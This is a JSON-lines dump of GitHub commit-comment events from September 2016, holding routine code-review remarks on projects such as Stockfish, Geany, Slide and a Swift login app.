{"id":"4514423996","type":"CommitCommentEvent","actor":{"login":"Nxt3"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18894323,"position":null,"line":null,"path":null,"commit_id":"6bbc398474614c606559ce493470e2ad90cea8c8","created_at":"2016-09-04T21:29:44Z","updated_at":"2016-09-04T21:29:44Z","body":"More or less, can you? I'm not sure I understood what you did\n\nOn Sun, Sep 4, 2016, 5:28 PM Carlos Crane <notifications@github.com> wrote:\n\n> If it is easy to implement, I'd say that is a good idea :)\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ccrama/Slide/commit/6bbc398474614c606559ce493470e2ad90cea8c8#commitcomment-18894320>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACzfmtdLAKErB9QHS1KccE_xjcPFcC93ks5qmzgHgaJpZM4J0lQP>\n> .\n>\n"}},"created_at":"2016-09-04T21:29:44Z"}
{"id":"4514424164","type":"CommitCommentEvent","actor":{"login":"ccrama"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18894324,"position":null,"line":null,"path":null,"commit_id":"8022521f1fb14d7c7824a6437676901e60e873ed","created_at":"2016-09-04T21:29:52Z","updated_at":"2016-09-04T21:29:52Z","body":"I guess I agree, feel free to remove itif you'd like"}},"created_at":"2016-09-04T21:29:52Z"}
{"id":"4514424508","type":"CommitCommentEvent","actor":{"login":"aashikhmin82"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18894326,"position":98,"line":98,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-04T21:30:10Z","updated_at":"2016-09-04T21:30:10Z","body":"Да, я понимаю, что там жуть творится, если элементов меньше трех"}},"created_at":"2016-09-04T21:30:10Z"}
{"id":"4514425682","type":"CommitCommentEvent","actor":{"login":"vitto-moz"},"repo":{"name":"vitto-moz/bootstrap_project"},"payload":{"comment":{"id":18894329,"position":null,"line":null,"path":null,"commit_id":"ff77946aa8e31be7975ac43f66818cb6f9e9aeae","created_at":"2016-09-04T21:30:56Z","updated_at":"2016-09-04T21:30:56Z","body":"should get more deeper knowladge about ajax to execute this task"}},"created_at":"2016-09-04T21:30:56Z"}
{"id":"4514426742","type":"CommitCommentEvent","actor":{"login":"leMaik"},"repo":{"name":"BuggyOrg/graphtools"},"payload":{"comment":{"id":18894333,"position":17,"line":17,"path":"draft/sampleQueries.js","commit_id":"4d2ad7efa89337ad38a4a521b5a82d2c9ecd9d53","created_at":"2016-09-04T21:31:49Z","updated_at":"2016-09-04T21:31:49Z","body":"There are compound nodes that can't be unpacked, i.e. recursive functions."}},"created_at":"2016-09-04T21:31:49Z"}
{"id":"4514426871","type":"CommitCommentEvent","actor":{"login":"adnasa"},"repo":{"name":"adnasa/dext-giphy-plugin"},"payload":{"comment":{"id":18894334,"position":null,"line":null,"path":null,"commit_id":"3d5ffd6b8cd09426c130c2209d7790dc2fb6c52d","created_at":"2016-09-04T21:31:56Z","updated_at":"2016-09-04T21:31:56Z","body":"#expectationmanagement please 😄 "}},"created_at":"2016-09-04T21:31:56Z"}
{"id":"4514427931","type":"CommitCommentEvent","actor":{"login":"adnasa"},"repo":{"name":"adnasa/dext-giphy-plugin"},"payload":{"comment":{"id":18894336,"position":null,"line":null,"path":null,"commit_id":"3d5ffd6b8cd09426c130c2209d7790dc2fb6c52d","created_at":"2016-09-04T21:32:40Z","updated_at":"2016-09-04T21:32:40Z","body":"yeah I tried, but I kept getting errors, so this was an act of <kbd>major</kbd> frustration! 😂 "}},"created_at":"2016-09-04T21:32:40Z"}
{"id":"4514429655","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18894339,"position":null,"line":null,"path":null,"commit_id":"c74da7ef9ef018059a64edc43bd81dfa9c95dbd9","created_at":"2016-09-04T21:34:07Z","updated_at":"2016-09-04T21:34:07Z","body":"Haha, I was also surprised, when I looked at it now 😀\n"}},"created_at":"2016-09-04T21:34:07Z"}
{"id":"4514431604","type":"CommitCommentEvent","actor":{"login":"charrednewth"},"repo":{"name":"charrednewth/Succubus-Rhapsodia-ENG"},"payload":{"comment":{"id":18894341,"position":null,"line":null,"path":null,"commit_id":"09885fd50f909ea1d0aacfff19502599dc55d0c1","created_at":"2016-09-04T21:35:28Z","updated_at":"2016-09-04T21:35:28Z","body":"btw I think we're better off cummunicating here. I take too much time writing a post on a forum :(\r\n\r\nonce I update the translation_check, we should be kinda synced."}},"created_at":"2016-09-04T21:35:28Z"}
{"id":"4514431994","type":"CommitCommentEvent","actor":{"login":"deshipu"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18894343,"position":14,"line":110,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T21:35:47Z","updated_at":"2016-09-04T21:35:47Z","body":"Thank you for explaining."}},"created_at":"2016-09-04T21:35:47Z"}
{"id":"4514432529","type":"CommitCommentEvent","actor":{"login":"LeonidVeriga"},"repo":{"name":"bridgedotnet/Bridge"},"payload":{"comment":{"id":18894344,"position":null,"line":null,"path":null,"commit_id":"8f23b63069dbfc2466c6a4855e07b01e738c8866","created_at":"2016-09-04T21:36:11Z","updated_at":"2016-09-04T21:36:11Z","body":"#1656 related"}},"created_at":"2016-09-04T21:36:11Z"}
{"id":"4514432827","type":"CommitCommentEvent","actor":{"login":"camcory"},"repo":{"name":"FOSSUC/Superuser"},"payload":{"comment":{"id":18894345,"position":null,"line":null,"path":null,"commit_id":"cf73c981b302dd625a691e92ca0d1366a4a187f3","created_at":"2016-09-04T21:36:25Z","updated_at":"2016-09-04T21:36:25Z","body":"No resource found that matches the given name (at 'notificationsIcon' with value '@drawable/ic_notifications')."}},"created_at":"2016-09-04T21:36:25Z"}
{"id":"4514435231","type":"CommitCommentEvent","actor":{"login":"Lilblue325"},"repo":{"name":"Lilblue325/-114924742"},"payload":{"comment":{"id":18894346,"position":2,"line":2,"path":"README.md","commit_id":"a2f910bd5bad18f3767538eb680608f4446ecdc4","created_at":"2016-09-04T21:38:18Z","updated_at":"2016-09-04T21:38:18Z","body":"<9827607759226>*$100000000"}},"created_at":"2016-09-04T21:38:18Z"}
{"id":"4514436097","type":"CommitCommentEvent","actor":{"login":"ZenLulz"},"repo":{"name":"ZenLulz/MemorySharp"},"payload":{"comment":{"id":18894347,"position":null,"line":null,"path":null,"commit_id":"fd49a2069f37d9f7e4ce8c66256ec401c5254170","created_at":"2016-09-04T21:38:57Z","updated_at":"2016-09-04T21:38:57Z","body":"Dear lolp1,\r\n\r\nI recently received a notification on Github about a similar message to this one. First at all, I would like to apologize for this very long delay.\r\n\r\nI have already seen you here and there on Ownedcore and I'm glad you participated to enhance the library.\r\n\r\nI quickly reviewed your library and seems to be great! I'll take a look to your modified version of MemorySharp and check out the optimizations you've done in it. :)\r\n\r\nI'll add you to the contributors of MemorySharp in the case I discover neat stuff that should be merged into MemorySharp!\r\n\r\nTo answer one of your questions in another message, I've planned to continue developing MemorySharp. I just made an announcement you can find here: http://binarysharp.com/topic/5032-hello-2016/\r\n\r\nFeel free to submit pull requests on my git repo to enhance the code base. This is always funnier when multiple developers are working on a project, hihi. :)\r\n\r\nKeep you in touch !\r\n\r\nCheers\r\nZenLulz\r\n\r\nThis is a copy of the message I sent you on Binarysharp (I don't know if you'll check it). :)\r\n"}},"created_at":"2016-09-04T21:38:57Z"}
{"id":"4514436457","type":"CommitCommentEvent","actor":{"login":"Lilblue325"},"repo":{"name":"Lilblue325/-114924742"},"payload":{"comment":{"id":18894348,"position":1,"line":1,"path":"README.md","commit_id":"a2f910bd5bad18f3767538eb680608f4446ecdc4","created_at":"2016-09-04T21:39:15Z","updated_at":"2016-09-04T21:39:15Z","body":"<#:9827607759226>*($10000000000)"}},"created_at":"2016-09-04T21:39:15Z"}
{"id":"4514437127","type":"CommitCommentEvent","actor":{"login":"codebrainz"},"repo":{"name":"geany/geany"},"payload":{"comment":{"id":18894349,"position":38,"line":55,"path":"src/pluginprivate.h","commit_id":"75827c69c0ba5c1b01cd0992fc6ef6354a9b0c38","created_at":"2016-09-04T21:39:49Z","updated_at":"2016-09-04T21:39:49Z","body":"Out of curiosity, what's the advantage of having this in the private structure by value, and then again in the public structure by pointer? Same for the PluginInfo struct. After making a few plugins using the new API I'm always wondering why I can't write this:\r\n\r\n```c\r\nplugin->info.name = \"foo\";\r\n...\r\nplugin->funcs.init = foo_init;\r\n```\r\n\r\nIs there a technical reason for the extra indirection which I don't see?"}},"created_at":"2016-09-04T21:39:49Z"}
{"id":"4514437971","type":"CommitCommentEvent","actor":{"login":"SMundt"},"repo":{"name":"SMundt/iobroker.lgtv"},"payload":{"comment":{"id":18894350,"position":null,"line":null,"path":null,"commit_id":"7af1a1e58cb6d9313451214eaffb874df333aed0","created_at":"2016-09-04T21:40:32Z","updated_at":"2016-09-04T21:40:32Z","body":"I think I've found it :)\r\n\r\n[https://github.com/SMundt/iobroker.lgtv/commit/e824c6384f1b71d7ac3951430e7feefd41094bf7](url)"}},"created_at":"2016-09-04T21:40:32Z"}
{"id":"4514440191","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18894351,"position":null,"line":null,"path":null,"commit_id":"810c3d4336d0db7855d1f99e0d96a7d1529f93ea","created_at":"2016-09-04T21:42:18Z","updated_at":"2016-09-04T21:42:18Z","body":"This won't work well whenever there are doubled pawns though..."}},"created_at":"2016-09-04T21:42:18Z"}
{"id":"4514440234","type":"CommitCommentEvent","actor":{"login":"Lilblue325"},"repo":{"name":"Lilblue325/-114924742"},"payload":{"comment":{"id":18894352,"position":null,"line":null,"path":null,"commit_id":"a2f910bd5bad18f3767538eb680608f4446ecdc4","created_at":"2016-09-04T21:42:21Z","updated_at":"2016-09-04T21:42:21Z","body":"#a5ff0e"}},"created_at":"2016-09-04T21:42:21Z"}
{"id":"4514441042","type":"CommitCommentEvent","actor":{"login":"Lilblue325"},"repo":{"name":"Lilblue325/-114924742"},"payload":{"comment":{"id":18894355,"position":2,"line":2,"path":"README.md","commit_id":"a2f910bd5bad18f3767538eb680608f4446ecdc4","created_at":"2016-09-04T21:43:00Z","updated_at":"2016-09-04T21:43:00Z","body":"#a5ff0egreen "}},"created_at":"2016-09-04T21:43:00Z"}
{"id":"4514444590","type":"CommitCommentEvent","actor":{"login":"Mafii"},"repo":{"name":"IDPA-2016-NEAT-CNN/NEAT_Visualizer"},"payload":{"comment":{"id":18894356,"position":null,"line":null,"path":null,"commit_id":"fc10588b9f953c8c2eb3147104d55cc833c0650b","created_at":"2016-09-04T21:45:17Z","updated_at":"2016-09-04T21:45:17Z","body":"@STJEREM can you test if this runs on linux or mac? Cheers!"}},"created_at":"2016-09-04T21:45:17Z"}
{"id":"4514445071","type":"CommitCommentEvent","actor":{"login":"b4n"},"repo":{"name":"geany/geany"},"payload":{"comment":{"id":18894357,"position":38,"line":55,"path":"src/pluginprivate.h","commit_id":"75827c69c0ba5c1b01cd0992fc6ef6354a9b0c38","created_at":"2016-09-04T21:45:36Z","updated_at":"2016-09-04T21:45:36Z","body":"you mean instead of `plugin->info->name = \"foo\";`?\r\nI think it is so the public part can be extended with new functions in the structures without messing with the other offsets as if it was a by-value member, while still encapsulating them."}},"created_at":"2016-09-04T21:45:36Z"}
{"id":"4514446269","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18894359,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T21:46:33Z","updated_at":"2016-09-04T21:46:33Z","body":"@snicolet \r\nYes, it is true for trees (graphs with no cycle), and your left to right construction will work nicely...\r\nOK, your definition of a \"group\" is a bit different than mine\r\n\r\nYou will count a2-a3 as 2 \"isolated groups\".\r\nWhich might be just fine for the intent of your test. Good luck ! "}},"created_at":"2016-09-04T21:46:33Z"}
{"id":"4514446642","type":"CommitCommentEvent","actor":{"login":"mpiecora"},"repo":{"name":"mauricetmeyer/OP1Bitwig"},"payload":{"comment":{"id":18894360,"position":null,"line":null,"path":null,"commit_id":"d3b7f4e4c3982042fd5f60e0e48c336b386cb323","created_at":"2016-09-04T21:46:52Z","updated_at":"2016-09-04T21:46:52Z","body":"I can't wait to try this! ..How do I try this?\r\n"}},"created_at":"2016-09-04T21:46:52Z"}
{"id":"4514447660","type":"CommitCommentEvent","actor":{"login":"Nxt3"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18894363,"position":null,"line":null,"path":null,"commit_id":"8022521f1fb14d7c7824a6437676901e60e873ed","created_at":"2016-09-04T21:47:43Z","updated_at":"2016-09-04T21:47:43Z","body":"It's your app. If you want it there, don't let me bully you into removing\nit.\n\nOn Sun, Sep 4, 2016, 5:29 PM Carlos Crane <notifications@github.com> wrote:\n\n> I guess I agree, feel free to remove itif you'd like\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ccrama/Slide/commit/8022521f1fb14d7c7824a6437676901e60e873ed#commitcomment-18894324>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACzfmuRIhFjCqNqtpHsoeQ9nfhPNMZZ8ks5qmzhRgaJpZM4J0lFs>\n> .\n>\n"}},"created_at":"2016-09-04T21:47:43Z"}
{"id":"4514447709","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18894364,"position":null,"line":null,"path":null,"commit_id":"810c3d4336d0db7855d1f99e0d96a7d1529f93ea","created_at":"2016-09-04T21:47:45Z","updated_at":"2016-09-04T21:47:45Z","body":"Yes, it it by design. Double isolated pawns are a liability, not a strength, so I don't see why we should count them as only one group."}},"created_at":"2016-09-04T21:47:45Z"}
{"id":"4514448587","type":"CommitCommentEvent","actor":{"login":"Lilblue325"},"repo":{"name":"Lilblue325/-114924742"},"payload":{"comment":{"id":18894365,"position":2,"line":2,"path":"README.md","commit_id":"a2f910bd5bad18f3767538eb680608f4446ecdc4","created_at":"2016-09-04T21:48:30Z","updated_at":"2016-09-04T21:48:30Z","body":"Green#a5ff0e"}},"created_at":"2016-09-04T21:48:30Z"}
{"id":"4514449095","type":"CommitCommentEvent","actor":{"login":"Lilblue325"},"repo":{"name":"Lilblue325/-114924742"},"payload":{"comment":{"id":18894366,"position":1,"line":1,"path":"README.md","commit_id":"a2f910bd5bad18f3767538eb680608f4446ecdc4","created_at":"2016-09-04T21:48:56Z","updated_at":"2016-09-04T21:48:56Z","body":"9"}},"created_at":"2016-09-04T21:48:56Z"}
{"id":"4514451786","type":"CommitCommentEvent","actor":{"login":"ArekZc"},"repo":{"name":"ArekZc/node-practice"},"payload":{"comment":{"id":18894367,"position":null,"line":null,"path":null,"commit_id":"ea9df32ca0d6123de502cd6d68da5e397e80b9c3","created_at":"2016-09-04T21:51:09Z","updated_at":"2016-09-04T21:51:09Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;xmGgb0GC&#x2F;5-add-continues-integration-for-project\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add continues integration for project</a>"}},"created_at":"2016-09-04T21:51:09Z"}
{"id":"4514452551","type":"CommitCommentEvent","actor":{"login":"SMiiCK"},"repo":{"name":"ElMejorge/HelloWorld"},"payload":{"comment":{"id":18894368,"position":4,"line":2,"path":"README.md","commit_id":"50eb0b2f7927d7f84a17389ddfcc93c272126057","created_at":"2016-09-04T21:51:44Z","updated_at":"2016-09-04T21:51:44Z","body":"Deep\r\n"}},"created_at":"2016-09-04T21:51:44Z"}
{"id":"4514454049","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18894370,"position":null,"line":null,"path":null,"commit_id":"810c3d4336d0db7855d1f99e0d96a7d1529f93ea","created_at":"2016-09-04T21:52:58Z","updated_at":"2016-09-04T21:52:58Z","body":"Oops. \r\na2 a3 b2 => 1 edge => 2 groups\r\ng2 h2 h3 => 2 edges => 1 group"}},"created_at":"2016-09-04T21:52:58Z"}
{"id":"4514454208","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18894371,"position":null,"line":null,"path":null,"commit_id":"810c3d4336d0db7855d1f99e0d96a7d1529f93ea","created_at":"2016-09-04T21:53:07Z","updated_at":"2016-09-04T21:53:07Z","body":"Hmm let's suppose we have\r\n```\r\n010\r\n101\r\n010\r\n```\r\nWe subtract 2 for the leftmost pawns and 1 for each of the central pawns, so we have 4-(2+1+1)=0 groups!"}},"created_at":"2016-09-04T21:53:07Z"}
{"id":"4514455921","type":"CommitCommentEvent","actor":{"login":"mamaloo"},"repo":{"name":"mamaloo/feever11"},"payload":{"comment":{"id":18894373,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-04T21:54:26Z","updated_at":"2016-09-04T21:54:26Z","body":"feever_11"}},"created_at":"2016-09-04T21:54:26Z"}
{"id":"4514458123","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18894375,"position":null,"line":null,"path":null,"commit_id":"810c3d4336d0db7855d1f99e0d96a7d1529f93ea","created_at":"2016-09-04T21:56:14Z","updated_at":"2016-09-04T21:56:14Z","body":"Indeed, the trick will work only for acyclic graphs."}},"created_at":"2016-09-04T21:56:14Z"}
{"id":"4514458298","type":"CommitCommentEvent","actor":{"login":"jafetmorales"},"repo":{"name":"jafetmorales/cats"},"payload":{"comment":{"id":18894376,"position":4,"line":0,"path":"README.md","commit_id":"5b287c24e5b0adc1397e456facc9729bc10292ae","created_at":"2016-09-04T21:56:22Z","updated_at":"2016-09-04T21:56:22Z","body":"Its not catify. Its cat."}},"created_at":"2016-09-04T21:56:22Z"}
{"id":"4514458332","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18894377,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T21:56:24Z","updated_at":"2016-09-04T21:56:24Z","body":"@Rocky640 that's great!"}},"created_at":"2016-09-04T21:56:24Z"}
{"id":"4514458680","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18894378,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T21:56:40Z","updated_at":"2016-09-04T21:56:40Z","body":"@Rocky640: Thanks :-)  \r\n\r\nSo my implementation is simple and fast, but as you said it will miss the cycles in the pawn forest. It means that c4-d5-e4-d3 will count as zero group instead of one, for instance. I think I can live with that, as such cycles are relatively rare and such a pawn cycle is usually a strength rather that a weakness."}},"created_at":"2016-09-04T21:56:40Z"}
{"id":"4514458914","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18894379,"position":null,"line":null,"path":null,"commit_id":"df66d6ef4a8c1ba4a30aab3f42bf5ebf3f70ffda","created_at":"2016-09-04T21:56:52Z","updated_at":"2016-09-04T21:56:52Z","body":"The proper way would probably be using ``g_environ_unsetenv ()`` - but since it works now we can just leave it I guess."}},"created_at":"2016-09-04T21:56:52Z"}
{"id":"4514459366","type":"CommitCommentEvent","actor":{"login":"codebrainz"},"repo":{"name":"geany/geany"},"payload":{"comment":{"id":18894380,"position":38,"line":55,"path":"src/pluginprivate.h","commit_id":"75827c69c0ba5c1b01cd0992fc6ef6354a9b0c38","created_at":"2016-09-04T21:57:12Z","updated_at":"2016-09-04T21:57:12Z","body":"Ok, that makes some kind of sense."}},"created_at":"2016-09-04T21:57:12Z"}
{"id":"4514460746","type":"CommitCommentEvent","actor":{"login":"mbostock"},"repo":{"name":"d3/d3-path"},"payload":{"comment":{"id":18894383,"position":null,"line":null,"path":null,"commit_id":"c9467d77893461a10c368648754459a1e59f20c1","created_at":"2016-09-04T21:58:22Z","updated_at":"2016-09-04T21:58:22Z","body":"This removal was intentional. The beginPath method is not part of the [CanvasPathMethods API](https://www.w3.org/TR/2dcontext/#canvaspathmethods), and so was removed. I do not recommend using the private fields—those are likely to break in a future release."}},"created_at":"2016-09-04T21:58:22Z"}
{"id":"4514461625","type":"CommitCommentEvent","actor":{"login":"ibarhatov"},"repo":{"name":"ibarhatov/HelloWorld"},"payload":{"comment":{"id":18894384,"position":24,"line":25,"path":"HelloWorld/src/com/company/Main.java","commit_id":"dfd2b2440868edcc949ff278eebd4577b959496b","created_at":"2016-09-04T21:59:04Z","updated_at":"2016-09-04T21:59:04Z","body":"Убрал умножение, добавил Formatter."}},"created_at":"2016-09-04T21:59:04Z"}
{"id":"4514463659","type":"CommitCommentEvent","actor":{"login":"mjc619"},"repo":{"name":"TeamWin/android_device_oneplus_onyx"},"payload":{"comment":{"id":18894385,"position":null,"line":null,"path":null,"commit_id":"688a9414491fdf84e7bf760be53747d5cc609f62","created_at":"2016-09-04T22:00:31Z","updated_at":"2016-09-04T22:00:31Z","body":"will this allow opx mm support?"}},"created_at":"2016-09-04T22:00:31Z"}
{"id":"4514465933","type":"CommitCommentEvent","actor":{"login":"icook"},"repo":{"name":"brylandonaldson/Oomwell"},"payload":{"comment":{"id":18894387,"position":null,"line":null,"path":null,"commit_id":"f2629eeffd2195eb4b72f0133e62c9ba06d10d73","created_at":"2016-09-04T22:02:06Z","updated_at":"2016-09-04T22:02:06Z","body":"One of the core issues you're having is that your `Login Scene` and `email and password scene` are using the same ViewController class to control their logic. They should each have their own controller to handle scene logic.\r\n\r\n`ViewController` is also too generic of a name. Generally each scene will end up with it's own controller, so you'll have `LoginViewController`, `SignupViewController`, etc."}},"created_at":"2016-09-04T22:02:06Z"}
{"id":"4514466782","type":"CommitCommentEvent","actor":{"login":"karolherbst"},"repo":{"name":"karolherbst/mesa"},"payload":{"comment":{"id":18894388,"position":null,"line":null,"path":null,"commit_id":"2429732be0adfb6c599a400eadfaa701ddeb1fe1","created_at":"2016-09-04T22:02:43Z","updated_at":"2016-09-04T22:02:43Z","body":"breaks tesla with splitted immediates"}},"created_at":"2016-09-04T22:02:43Z"}
{"id":"4514467672","type":"CommitCommentEvent","actor":{"login":"quozl"},"repo":{"name":"samdroid-apps/sugar"},"payload":{"comment":{"id":18894389,"position":84,"line":84,"path":"src/jarabe/journal/projectview.py","commit_id":"67b546ef5d81f7b0968fda06d99a5767e12953aa","created_at":"2016-09-04T22:03:21Z","updated_at":"2016-09-04T22:03:21Z","body":"This UI string and others are missing in translations because po/POTFILES.in has not been updated to add the new projectview.py file."}},"created_at":"2016-09-04T22:03:21Z"}
{"id":"4514468316","type":"CommitCommentEvent","actor":{"login":"icook"},"repo":{"name":"brylandonaldson/Oomwell"},"payload":{"comment":{"id":18894390,"position":35,"line":41,"path":"Oomwell/ViewController.swift","commit_id":"f2629eeffd2195eb4b72f0133e62c9ba06d10d73","created_at":"2016-09-04T22:03:46Z","updated_at":"2016-09-04T22:03:46Z","body":"Errors could happen for many reasons, such as failed internet connection. Think of odd behavior that would result from this incorrect assumption."}},"created_at":"2016-09-04T22:03:46Z"}
{"id":"4514468950","type":"CommitCommentEvent","actor":{"login":"icook"},"repo":{"name":"brylandonaldson/Oomwell"},"payload":{"comment":{"id":18894392,"position":20,"line":26,"path":"Oomwell/ViewController.swift","commit_id":"f2629eeffd2195eb4b72f0133e62c9ba06d10d73","created_at":"2016-09-04T22:04:12Z","updated_at":"2016-09-04T22:04:12Z","body":"Why are you trying to save user information when the view loads? I had to comment this to get the application to run at all."}},"created_at":"2016-09-04T22:04:12Z"}
{"id":"4514469778","type":"CommitCommentEvent","actor":{"login":"loveGhb"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18894393,"position":null,"line":null,"path":null,"commit_id":"bc9d67abbd7f2d42c028ead9f5a9d9ad73c31d85","created_at":"2016-09-04T22:04:43Z","updated_at":"2016-09-04T22:04:43Z","body":"@sgdc3 to be honest I could use a little updating to Java 8 : )"}},"created_at":"2016-09-04T22:04:43Z"}
{"id":"4514470128","type":"CommitCommentEvent","actor":{"login":"samdroid-apps"},"repo":{"name":"samdroid-apps/sugar"},"payload":{"comment":{"id":18894394,"position":84,"line":84,"path":"src/jarabe/journal/projectview.py","commit_id":"67b546ef5d81f7b0968fda06d99a5767e12953aa","created_at":"2016-09-04T22:04:59Z","updated_at":"2016-09-04T22:04:59Z","body":"What is the optimal way to update them?  What method do you use?\n\nOn Sep 5, 2016 8:03 AM, \"James Cameron\" <notifications@github.com> wrote:\n\n> This UI string and others are missing in translations because\n> po/POTFILES.in has not been updated to add the new projectview.py file.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/samdroid-apps/sugar/commit/67b546ef5d81f7b0968fda06d99a5767e12953aa#commitcomment-18894389>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFvjmlZ54Zw02ce9VLMleyay3qNMFycfks5qm0ApgaJpZM4J0o49>\n> .\n>\n"}},"created_at":"2016-09-04T22:04:59Z"}
{"id":"4514471001","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":18894395,"position":null,"line":null,"path":null,"commit_id":"d6b4dea7cb3cc15383ff02310ab166825ae69285","created_at":"2016-09-04T22:05:33Z","updated_at":"2016-09-04T22:05:33Z","body":"Wow ATM I'm too tired to check your code but it looks very interesting!"}},"created_at":"2016-09-04T22:05:33Z"}
{"id":"4514474184","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"fritsvanveen/QGIS"},"payload":{"comment":{"id":18894401,"position":null,"line":null,"path":null,"commit_id":"eb0eb126be659c9aa5d1ecbde5ab499dfb494543","created_at":"2016-09-04T22:07:34Z","updated_at":"2016-09-04T22:07:34Z","body":"@fritsvanveen does it make any difference if you increase the label distance from line (in the placement tab)?"}},"created_at":"2016-09-04T22:07:34Z"}
{"id":"4514476400","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18894402,"position":null,"line":null,"path":null,"commit_id":"a57f2e8db0357dcd12eee10e7bf1c16c4a904e6b","created_at":"2016-09-04T22:09:11Z","updated_at":"2016-09-04T22:09:11Z","body":"Note: I did not check the build with this commit because the build is currently broken for me on WotLK since one of the GuardianAI commits (I think someone already reported this), but I highly doubt my commit would break building on WotLK and not on TBC and Classic."}},"created_at":"2016-09-04T22:09:11Z"}
{"id":"4514476785","type":"CommitCommentEvent","actor":{"login":"icook"},"repo":{"name":"brylandonaldson/Oomwell"},"payload":{"comment":{"id":18894403,"position":null,"line":null,"path":null,"commit_id":"f2629eeffd2195eb4b72f0133e62c9ba06d10d73","created_at":"2016-09-04T22:09:26Z","updated_at":"2016-09-04T22:09:26Z","body":"Some other generic comments:\r\n\r\n* Consistent naming schemes are important long term for readability. Any code that does it's job will spend more time getting read than it took to write, so writing for readability is a good habit to get into.\r\n* To do the transition after login look at this [stack overflow answer](https://stackoverflow.com/questions/25375409/how-to-switch-view-controllers-in-swift)\r\n* You're probably already aware, but your error handling needs to be more specific."}},"created_at":"2016-09-04T22:09:26Z"}
{"id":"4514479652","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18894406,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T22:11:28Z","updated_at":"2016-09-04T22:11:28Z","body":"Ah ah. just not to drive English people crazy (V= Vertices, E=Edges), you should write\r\n\"I have an implementation there, which uses the fact that in a graph G=(V, E) the number of connected components is C=|V|-|E| if the graph is acyclic\"\r\n\r\n{c3 - c4 -d3- d4} and {c3 d3 d4 e4} are also 0. Maybe there is a way to \"fix\" this. \r\nBut now the interesting part will be to make us of this new concept."}},"created_at":"2016-09-04T22:11:28Z"}
{"id":"4514481106","type":"CommitCommentEvent","actor":{"login":"michaelkirschbaum"},"repo":{"name":"michaelkirschbaum/bug-tracker"},"payload":{"comment":{"id":18894407,"position":null,"line":null,"path":null,"commit_id":"1fadcfa4f273782d0aec18c1455c2957beaa5234","created_at":"2016-09-04T22:12:28Z","updated_at":"2016-09-04T22:12:28Z","body":"Fixes #18"}},"created_at":"2016-09-04T22:12:28Z"}
{"id":"4514481406","type":"CommitCommentEvent","actor":{"login":"Tobje1"},"repo":{"name":"Tobje1/Site-1"},"payload":{"comment":{"id":18894408,"position":9,"line":13,"path":"site.html","commit_id":"c436d5c60002d8f18d5255d65e617a57eba7205f","created_at":"2016-09-04T22:12:42Z","updated_at":"2016-09-04T22:12:42Z","body":"zorg dat de buttons gecenterd zijn met dispay: in-line ofzo @Tobje1 "}},"created_at":"2016-09-04T22:12:42Z"}
